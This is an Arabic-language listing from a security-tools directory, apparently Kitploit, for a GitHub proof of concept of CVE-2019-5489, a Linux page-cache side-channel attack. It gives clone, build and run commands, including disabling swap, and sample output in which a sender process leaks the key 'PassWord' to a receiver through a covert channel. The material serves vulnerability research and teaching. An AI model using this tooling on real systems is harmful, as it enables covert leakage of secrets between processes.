Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-5489 — هجمات القناة الجانبية لذاكرة التخزين المؤقت للصفحات (CVE-2019-5489) إثبات المفهوم لنظام لينكس | Kitploit
أدوات/GitHubGitHub/mmxsrup/cve-2019-5489
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتالأوراق والأبحاثالتعلم والتعليماستغلال الملفات الثنائية
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

هجمات القناة الجانبية لذاكرة التخزين المؤقت للصفحات (CVE-2019-5489) إثبات المفهوم لنظام لينكس

عرض المستودع
1032منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE 2019-5489

يحتوي هذا المستودع على إثبات المفهوم لهجمات القناة الجانبية لذاكرة التخزين المؤقت للصفحات (CVE-2019-5489) لنظام Linux.

من أجل تقييم القناة الجانبية لذاكرة التخزين المؤقت للصفحات، قمت بتطبيق قناة سرية بين عمليتين. ترسل عملية المرسل بيانات سرية إلى عملية المستقبل عبر القناة الجانبية لذاكرة التخزين المؤقت للصفحات. تم التخفيف من هجمات ذاكرة التخزين المؤقت للصفحات في نواة لينكس 5.0 والإصدارات الأحدث، لذا ستعمل هذه الأداة (PoC) فقط قبل نواة لينكس 5.0.

ملاحظة: لقد تم اختبارها على Ubuntu 18.04، Linux 4.15.0-70.

البناء

قم بتشغيل الأمر التالي.

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

التشغيل

قم بتعطيل مساحة المبادلة لتسهيل الهجوم.

root@kitploit:~
swapoff -a

الطرفية 1

أولاً، قم بتشغيل الأمر التالي في الطرفية 1.

root@kitploit:~
make run-sender

الطرفية 2

بعد ظهور على الطرفية 1، قم بتشغيل الأمر التالي.

sending 1th character ...
root@kitploit:~
make run-receiver

المخرجات

إذا تم التنفيذ بنجاح، فسيتم إخراج ما يلي.
يظهر هذا أن المفتاح تم إرساله من عملية المرسل إلى عملية المستقبل عبر القناة الجانبية لذاكرة التخزين المؤقت للصفحات.

الطرفية 1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

الطرفية 2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

المراجع

  • Daniel Gruss وآخرون. هجمات ذاكرة التخزين المؤقت للصفحات [CCS 19]
تنزيل الأداة